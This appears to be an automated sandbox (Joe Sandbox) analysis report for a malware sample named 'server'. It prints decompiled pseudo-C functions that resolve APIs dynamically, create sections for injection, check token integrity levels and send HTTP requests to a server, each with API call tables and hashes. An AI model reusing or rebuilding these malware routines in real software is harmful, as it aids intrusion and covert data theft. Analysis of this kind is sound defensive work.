                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID: cess$kernel32.dll
                • API String ID: 4275171209-1230238691
                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                • Instruction ID: 2a9954c425b5c615df3655688d6329589181e04494bf30fe7994701720054a9d
                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                • Instruction Fuzzy Hash: 2E526974A01229DFDB64CF58C985BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 93%
                			E02224BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                				void* _t17;
                				void* _t18;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                				intOrPtr _t24;
                				void* _t37;
                				void* _t41;
                				intOrPtr* _t45;
                
                				_t41 = __edi;
                				_t37 = __ebx;
                				_t45 = __eax;
                				_t16 =  *((intOrPtr*)(__eax + 0x20));
                				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                					E022216B2(_t16, __ecx, 0xea60);
                				}
                				_t17 =  *(_t45 + 0x18);
                				_push(_t37);
                				_push(_t41);
                				if(_t17 != 0) {
                					InternetSetStatusCallback(_t17, 0);
                					InternetCloseHandle( *(_t45 + 0x18)); // executed
                				}
                				_t18 =  *(_t45 + 0x14);
                				if(_t18 != 0) {
                					InternetSetStatusCallback(_t18, 0);
                					InternetCloseHandle( *(_t45 + 0x14));
                				}
                				_t19 =  *(_t45 + 0x10);
                				if(_t19 != 0) {
                					InternetSetStatusCallback(_t19, 0);
                					InternetCloseHandle( *(_t45 + 0x10));
                				}
                				_t20 =  *(_t45 + 0x1c);
                				if(_t20 != 0) {
                					CloseHandle(_t20);
                				}
                				_t21 =  *(_t45 + 0x20);
                				if(_t21 != 0) {
                					CloseHandle(_t21);
                				}
                				_t22 =  *((intOrPtr*)(_t45 + 8));
                				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                					E022261DA(_t22);
                					 *((intOrPtr*)(_t45 + 8)) = 0;
                					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                				}
                				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                					E022261DA(_t23);
                				}
                				_t24 =  *_t45;
                				if(_t24 != 0) {
                					_t24 = E022261DA(_t24);
                				}
                				_t46 =  *((intOrPtr*)(_t45 + 4));
                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                					return E022261DA(_t46);
                				}
                				return _t24;
                			}












                0x02224be7
                0x02224be7
                0x02224be9
                0x02224beb
                0x02224bf2
                0x02224bf9
                0x02224bf9
                0x02224bfe
                0x02224c01
                0x02224c08
                0x02224c11
                0x02224c15
                0x02224c1a
                0x02224c1a
                0x02224c1c
                0x02224c21
                0x02224c25
                0x02224c2a
                0x02224c2a
                0x02224c2c
                0x02224c31
                0x02224c35
                0x02224c3a
                0x02224c3a
                0x02224c3c
                0x02224c47
                0x02224c4a
                0x02224c4a
                0x02224c4c
                0x02224c51
                0x02224c54
                0x02224c54
                0x02224c56
                0x02224c5d
                0x02224c60
                0x02224c65
                0x02224c68
                0x02224c68
                0x02224c6b
                0x02224c70
                0x02224c73
                0x02224c73
                0x02224c78
                0x02224c7c
                0x02224c7f
                0x02224c7f
                0x02224c84
                0x02224c89
                0x00000000
                0x02224c8c
                0x02224c93

                APIs
                • InternetSetStatusCallback.WININET(?,00000000), ref: 02224C15
                • InternetCloseHandle.WININET(?), ref: 02224C1A
                • InternetSetStatusCallback.WININET(?,00000000), ref: 02224C25
                • InternetCloseHandle.WININET(?), ref: 02224C2A
                • InternetSetStatusCallback.WININET(?,00000000), ref: 02224C35
                • InternetCloseHandle.WININET(?), ref: 02224C3A
                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02222248,?,?,74CF81D0,00000000,00000000), ref: 02224C4A
                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02222248,?,?,74CF81D0,00000000,00000000), ref: 02224C54
                  • Part of subcall function 022216B2: WaitForMultipleObjects.KERNEL32(00000002,02227C47,00000000,02227C47,?,?,?,02227C47,0000EA60), ref: 022216CD
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                • String ID:
                • API String ID: 2824497044-0
                • Opcode ID: efbc3d252f667f403c8d2f5a98604a8f64a8132cb5597e7f8b94c3428a8470c8
                • Instruction ID: 9e268551ff996fee5cf6ebd06fee62baaa065c3a805a4e73983b84ab6a33c327
                • Opcode Fuzzy Hash: efbc3d252f667f403c8d2f5a98604a8f64a8132cb5597e7f8b94c3428a8470c8
                • Instruction Fuzzy Hash: B4116D36A107787BC530BFE9ED84C1BB7EEAB442083551D18F089D3625C732F88D8A20
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 100%
                			E02225E40(long* _a4) {
                				long _v8;
                				void* _v12;
                				void _v16;
                				long _v20;
                				int _t33;
                				void* _t46;
                
                				_v16 = 1;
                				_v20 = 0x2000;
                				if( *0x222a2fc > 5) {
                					_v16 = 0;
                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                						_v8 = 0;
                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                						if(_v8 != 0) {
                							_t46 = E022233DC(_v8);
                							if(_t46 != 0) {
                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                								if(_t33 != 0) {
                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                								}
                								E022261DA(_t46);
                							}
                						}
                						CloseHandle(_v12);
                					}
                				}
                				 *_a4 = _v20;
                				return _v16;
                			}









                0x02225e4d
                0x02225e54
                0x02225e5b
                0x02225e6f
                0x02225e7a
                0x02225e92
                0x02225e9f
                0x02225ea2
                0x02225ea7
                0x02225eb2
                0x02225eb6
                0x02225ec5
                0x02225ec9
                0x02225ee5
                0x02225ee5
                0x02225ee9
                0x02225ee9
                0x02225eee
                0x02225ef2
                0x02225ef8
                0x02225ef9
                0x02225f00
                0x02225f06

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02225E72
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02225E92
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02225EA2
                • CloseHandle.KERNEL32(00000000), ref: 02225EF2
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02225EC5
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02225ECD
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02225EDD
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: 87525aae5686bfac32aa0c9916c57062050f97d289a6abbeeab68aaf2549aa04
                • Instruction ID: eaec648a3ef9c7d397d73e574188ce94e314d13a3c5293d6f3a44c39a9c39201
                • Opcode Fuzzy Hash: 87525aae5686bfac32aa0c9916c57062050f97d289a6abbeeab68aaf2549aa04
                • Instruction Fuzzy Hash: B3214A75D0021DBFEB10DFD0DC84EAEBB79EB48314F1044A5E910A6160DB729B58DF50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 64%
                			E02226675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				intOrPtr _v8;
                				intOrPtr _t9;
                				intOrPtr _t13;
                				char* _t19;
                				char* _t28;
                				void* _t33;
                				void* _t34;
                				char* _t36;
                				void* _t38;
                				intOrPtr* _t39;
                				char* _t40;
                				char* _t42;
                				char* _t43;
                
                				_t34 = __edx;
                				_push(__ecx);
                				_t9 =  *0x222a348; // 0x9ad5a8
                				_t1 = _t9 + 0x222b516; // 0x253d7325
                				_t36 = 0;
                				_t28 = E02225815(__ecx, _t1);
                				if(_t28 != 0) {
                					_t39 = __imp__;
                					_t13 =  *_t39(_t28, _t38);
                					_v8 = _t13;
                					_t6 =  *_t39(_a4) + 1; // 0x2bd9601
                					_t40 = E022233DC(_v8 + _t6);
                					if(_t40 != 0) {
                						strcpy(_t40, _t28);
                						_pop(_t33);
                						__imp__(_t40, _a4);
                						_t19 = E02225063(_t33, _t34, _t40, _a8); // executed
                						_t36 = _t19;
                						E022261DA(_t40);
                						_t42 = E02224AC7(StrTrimA(_t36, "="), _t36);
                						if(_t42 != 0) {
                							E022261DA(_t36);
                							_t36 = _t42;
                						}
                						_t43 = E02222708(_t36, _t33);
                						if(_t43 != 0) {
                							E022261DA(_t36);
                							_t36 = _t43;
                						}
                					}
                					E022261DA(_t28);
                				}
                				return _t36;
                			}
















                0x02226675
                0x02226678
                0x02226679
                0x02226680
                0x02226687
                0x0222668e
                0x02226692
                0x02226699
                0x022266a0
                0x022266a5
                0x022266ad
                0x022266b7
                0x022266bb
                0x022266bf
                0x022266c5
                0x022266ca
                0x022266d4
                0x022266da
                0x022266dc
                0x022266f3
                0x022266f7
                0x022266fa
                0x022266ff
                0x022266ff
                0x02226708
                0x0222670c
                0x0222670f
                0x02226714
                0x02226714
                0x0222670c
                0x02226717
                0x0222671c
                0x02226722

                APIs
                  • Part of subcall function 02225815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0222668E,253D7325,00000000,00000000,?,7491C740,02223ECE), ref: 0222587C
                  • Part of subcall function 02225815: sprintf.NTDLL ref: 0222589D
                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A0
                • lstrlen.KERNEL32(00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A8
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • strcpy.NTDLL ref: 022266BF
                • lstrcat.KERNEL32(00000000,00000000), ref: 022266CA
                  • Part of subcall function 02225063: lstrlen.KERNEL32(00000000,00000000,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 02225074
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266E7
                  • Part of subcall function 02224AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,022266F3,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 02224AD1
                  • Part of subcall function 02224AC7: _snprintf.NTDLL ref: 02224B2F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: acb067bf1d042b38d33b48fc227e6b8837deb4ca2ab97913cdebebbe9d2f16db
                • Instruction ID: ba82c147afc8927e87627952fafa3f5762e32d95e096ea7bd1dbfa7c53eb76f2
                • Opcode Fuzzy Hash: acb067bf1d042b38d33b48fc227e6b8837deb4ca2ab97913cdebebbe9d2f16db
                • Instruction Fuzzy Hash: AF119133921239774622BBE8AC84CBE36AE9F457643154015F904AB219DE67DA0A4BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 424 401202-401214 call 4012e6 427 4012d5 424->427 428 40121a-40124f GetModuleHandleA GetProcAddress 424->428 429 4012dc-4012e3 427->429 430 401251-401265 GetProcAddress 428->430 431 4012cd-4012d3 call 401ba9 428->431 430->431 432 401267-40127b GetProcAddress 430->432 431->429 432->431 434 40127d-401291 GetProcAddress 432->434 434->431 436 401293-4012a7 GetProcAddress 434->436 436->431 437 4012a9-4012ba call 40110b 436->437 439 4012bf-4012c4 437->439 439->431 440 4012c6-4012cb 439->440 440->429
                C-Code - Quality: 100%
                			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v8;
                				_Unknown_base(*)()* _t29;
                				_Unknown_base(*)()* _t33;
                				_Unknown_base(*)()* _t36;
                				_Unknown_base(*)()* _t39;
                				_Unknown_base(*)()* _t42;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t50;
                				intOrPtr _t56;
                
                				_t56 = E004012E6(0x20);
                				if(_t56 == 0) {
                					_v8 = 8;
                				} else {
                					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
                					_v8 = 0x7f;
                					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
                					 *(_t56 + 0xc) = _t29;
                					if(_t29 == 0) {
                						L8:
                						E00401BA9(_t56);
                					} else {
                						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
                						 *(_t56 + 0x10) = _t33;
                						if(_t33 == 0) {
                							goto L8;
                						} else {
                							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
                							 *(_t56 + 0x14) = _t36;
                							if(_t36 == 0) {
                								goto L8;
                							} else {
                								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
                								 *(_t56 + 0x18) = _t39;
                								if(_t39 == 0) {
                									goto L8;
                								} else {
                									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
                									 *(_t56 + 0x1c) = _t42;
                									if(_t42 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                										_t46 = E0040110B(_t56, _a12); // executed
                										_v8 = _t46;
                										if(_t46 != 0) {
                											goto L8;
                										} else {
                											 *_a16 = _t56;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}












                0x00401210
                0x00401214
                0x004012d5
                0x0040121a
                0x00401232
                0x00401241
                0x00401248
                0x0040124a
                0x0040124f
                0x004012cd
                0x004012ce
                0x00401251
                0x0040125e
                0x00401260
                0x00401265
                0x00000000
                0x00401267
                0x00401274
                0x00401276
                0x0040127b
                0x00000000
                0x0040127d
                0x0040128a
                0x0040128c
                0x00401291
                0x00000000
                0x00401293
                0x004012a0
                0x004012a2
                0x004012a7
                0x00000000
                0x004012a9
                0x004012af
                0x004012b5
                0x004012ba
                0x004012bf
                0x004012c4
                0x00000000
                0x004012c6
                0x004012c9
                0x004012c9
                0x004012c4
                0x004012a7
                0x00401291
                0x0040127b
                0x00401265
                0x0040124f
                0x004012e3

                APIs
                  • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                  • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
                  • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
                • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E022251D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                				void* __esi;
                				long _t10;
                				void* _t18;
                				void* _t22;
                
                				_t9 = __eax;
                				_t22 = __eax;
                				if(_a4 != 0 && E02222058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                					L9:
                					return GetLastError();
                				}
                				_t10 = E02227B83(_t9, _t18, _t22, _a8); // executed
                				if(_t10 == 0) {
                					ResetEvent( *(_t22 + 0x1c));
                					ResetEvent( *(_t22 + 0x20));
                					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                						SetEvent( *(_t22 + 0x1c));
                						goto L7;
                					} else {
                						_t10 = GetLastError();
                						if(_t10 == 0x3e5) {
                							L7:
                							_t10 = 0;
                						}
                					}
                				}
                				if(_t10 == 0xffffffff) {
                					goto L9;
                				}
                				return _t10;
                			}







                0x022251d8
                0x022251e5
                0x022251e7
                0x0222524a
                0x00000000
                0x0222524a
                0x022251ff
                0x02225206
                0x02225212
                0x02225217
                0x0222522d
                0x0222523d
                0x00000000
                0x0222522f
                0x0222522f
                0x02225236
                0x02225243
                0x02225243
                0x02225243
                0x02225236
                0x0222522d
                0x02225248
                0x00000000
                0x00000000
                0x0222524e

                APIs
                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,022221E7,?,?,74CF81D0,00000000), ref: 02225212
                • ResetEvent.KERNEL32(?), ref: 02225217
                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02225224
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02223F34,00000000,?,?), ref: 0222522F
                • GetLastError.KERNEL32(?,?,00000102,022221E7,?,?,74CF81D0,00000000), ref: 0222524A
                  • Part of subcall function 02222058: lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,022251F7,?,?,?,?,00000102,022221E7,?,?,74CF81D0), ref: 02222064
                  • Part of subcall function 02222058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,022251F7,?,?,?,?,00000102,022221E7,?), ref: 022220C2
                  • Part of subcall function 02222058: lstrcpy.KERNEL32(00000000,00000000), ref: 022220D2
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02223F34,00000000,?), ref: 0222523D
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 3739416942-0
                • Opcode ID: 04586817cc830329435cdfcd53a76745fe90763a7b0f30d1f352fe251df5c869
                • Instruction ID: 3eb3ab0b348eabda375a5b653c33806b3960e85e9ac4cf62ba56cb79755a5fe0
                • Opcode Fuzzy Hash: 04586817cc830329435cdfcd53a76745fe90763a7b0f30d1f352fe251df5c869
                • Instruction Fuzzy Hash: 9101AD31120222BAD7306AE0EC48F5BB7A9BF48324F608B24F491D10E4D763E96CDA20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E02222523(signed int __edx) {
                				signed int _v8;
                				long _v12;
                				CHAR* _v16;
                				long _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t21;
                				CHAR* _t22;
                				CHAR* _t25;
                				intOrPtr _t26;
                				void* _t27;
                				void* _t31;
                				intOrPtr _t32;
                				void* _t33;
                				CHAR* _t37;
                				CHAR* _t43;
                				CHAR* _t44;
                				CHAR* _t45;
                				void* _t50;
                				void* _t52;
                				signed char _t57;
                				intOrPtr _t59;
                				signed int _t60;
                				void* _t64;
                				CHAR* _t68;
                				CHAR* _t69;
                				char* _t70;
                				void* _t71;
                
                				_t62 = __edx;
                				_v20 = 0;
                				_v8 = 0;
                				_v12 = 0;
                				_t21 = E02224520();
                				if(_t21 != 0) {
                					_t60 =  *0x222a2fc; // 0x2000000a
                					_t56 = (_t60 & 0xf0000000) + _t21;
                					 *0x222a2fc = (_t60 & 0xf0000000) + _t21;
                				}
                				_t22 =  *0x222a178(0, 2); // executed
                				_v16 = _t22;
                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                					_t25 = E02223037( &_v8,  &_v20); // executed
                					_t55 = _t25;
                					_t26 =  *0x222a348; // 0x9ad5a8
                					if( *0x222a2fc > 5) {
                						_t8 = _t26 + 0x222b51d; // 0x4d283a53
                						_t27 = _t8;
                					} else {
                						_t7 = _t26 + 0x222b9db; // 0x44283a44
                						_t27 = _t7;
                					}
                					E02224332(_t27, _t27);
                					_t31 = E0222415A(_t62,  &_v20,  &_v12); // executed
                					if(_t31 == 0) {
                						CloseHandle(_v20);
                					}
                					_t64 = 5;
                					if(_t55 != _t64) {
                						_t32 = E022227A0();
                						 *0x222a310 =  *0x222a310 ^ 0x81bbe65d;
                						 *0x222a36c = _t32;
                						_t33 = E022233DC(0x60);
                						 *0x222a3cc = _t33;
                						__eflags = _t33;
                						if(_t33 == 0) {
                							_push(8);
                							_pop(0);
                						} else {
                							memset(_t33, 0, 0x60);
                							_t50 =  *0x222a3cc; // 0x2bd9600
                							_t71 = _t71 + 0xc;
                							__imp__(_t50 + 0x40);
                							_t52 =  *0x222a3cc; // 0x2bd9600
                							 *_t52 = 0x222b142;
                						}
                						_t55 = 0;
                						__eflags = 0;
                						if(0 == 0) {
                							_t37 = RtlAllocateHeap( *0x222a2d8, 0, 0x43);
                							 *0x222a368 = _t37;
                							__eflags = _t37;
                							if(_t37 == 0) {
                								_push(8);
                								_pop(0);
                							} else {
                								_t57 =  *0x222a2fc; // 0x2000000a
                								_t62 = _t57 & 0x000000ff;
                								_t59 =  *0x222a348; // 0x9ad5a8
                								_t13 = _t59 + 0x222b74a; // 0x697a6f4d
                								_t56 = _t13;
                								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x222927b);
                							}
                							_t55 = 0;
                							__eflags = 0;
                							if(0 == 0) {
                								asm("sbb eax, eax");
                								E02223BD3( ~_v8 &  *0x222a310,  &E0222A00C); // executed
                								_t43 = E02221D8A(0, _t56, _t62, _t64,  &E0222A00C); // executed
                								_t55 = _t43;
                								__eflags = _t55;
                								if(_t55 != 0) {
                									goto L30;
                								}
                								_t44 = E02226EA3(_t62); // executed
                								__eflags = _t44;
                								if(_t44 != 0) {
                									__eflags = _v8;
                									_t68 = _v12;
                									if(_v8 != 0) {
                										L29:
                										_t45 = E02226815(_t62, _t68, _v8); // executed
                										_t55 = _t45;
                										goto L30;
                									}
                									__eflags = _t68;
                									if(__eflags == 0) {
                										goto L30;
                									}
                									_t55 = E02225C31(__eflags,  &(_t68[4]));
                									__eflags = _t55;
                									if(_t55 == 0) {
                										goto L30;
                									}
                									goto L29;
                								}
                								_t55 = 8;
                							}
                						}
                					} else {
                						_t69 = _v12;
                						if(_t69 == 0) {
                							L30:
                							if(_v16 == 0 || _v16 == 1) {
                								 *0x222a17c();
                							}
                							goto L34;
                						}
                						_t70 =  &(_t69[4]);
                						do {
                						} while (E022223C4(_t64, _t70, 0, 1) == 0x4c7);
                					}
                					goto L30;
                				} else {
                					_t55 = _t22;
                					L34:
                					return _t55;
                				}
                			}
































                0x02222523
                0x0222252d
                0x02222530
                0x02222533
                0x02222536
                0x0222253d
                0x0222253f
                0x0222254b
                0x0222254d
                0x0222254d
                0x02222556
                0x0222255c
                0x02222561
                0x0222257b
                0x02222587
                0x02222589
                0x0222258e
                0x02222598
                0x02222598
                0x02222590
                0x02222590
                0x02222590
                0x02222590
                0x0222259f
                0x022225ac
                0x022225b3
                0x022225b8
                0x022225b8
                0x022225c1
                0x022225c4
                0x022225ea
                0x022225ef
                0x022225fb
                0x02222600
                0x02222605
                0x0222260a
                0x0222260c
                0x02222638
                0x0222263a
                0x0222260e
                0x02222612
                0x02222617
                0x0222261c
                0x02222623
                0x02222629
                0x0222262e
                0x02222634
                0x0222263b
                0x0222263d
                0x0222263f
                0x0222264e
                0x02222654
                0x02222659
                0x0222265b
                0x0222268b
                0x0222268d
                0x0222265d
                0x0222265d
                0x02222663
                0x02222670
                0x02222676
                0x02222676
                0x0222267e
                0x02222687
                0x0222268e
                0x02222690
                0x02222692
                0x02222699
                0x022226a6
                0x022226ab
                0x022226b0
                0x022226b2
                0x022226b4
                0x00000000
                0x00000000
                0x022226b6
                0x022226bb
                0x022226bd
                0x022226c4
                0x022226c8
                0x022226cb
                0x022226e0
                0x022226e4
                0x022226e9
                0x00000000
                0x022226e9
                0x022226cd
                0x022226cf
                0x00000000
                0x00000000
                0x022226da
                0x022226dc
                0x022226de
                0x00000000
                0x00000000
                0x00000000
                0x022226de
                0x022226c1
                0x022226c1
                0x02222692
                0x022225c6
                0x022225c6
                0x022225cb
                0x022226eb
                0x022226f0
                0x022226f8
                0x022226f8
                0x00000000
                0x022226f0
                0x022225d1
                0x022225d4
                0x022225de
                0x022225e5
                0x00000000
                0x02222700
                0x02222700
                0x02222703
                0x02222707
                0x02222707

                APIs
                  • Part of subcall function 02224520: GetModuleHandleA.KERNEL32(4C44544E,00000000,0222253B,00000001), ref: 0222452F
                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 022225B8
                  • Part of subcall function 022227A0: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 022227C4
                  • Part of subcall function 022227A0: wsprintfA.USER32 ref: 02222828
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • memset.NTDLL ref: 02222612
                • RtlInitializeCriticalSection.NTDLL(02BD95C0), ref: 02222623
                  • Part of subcall function 02225C31: memset.NTDLL ref: 02225C4B
                  • Part of subcall function 02225C31: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02225C91
                  • Part of subcall function 02225C31: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02225C9C
                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0222264E
                • wsprintfA.USER32 ref: 0222267E
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
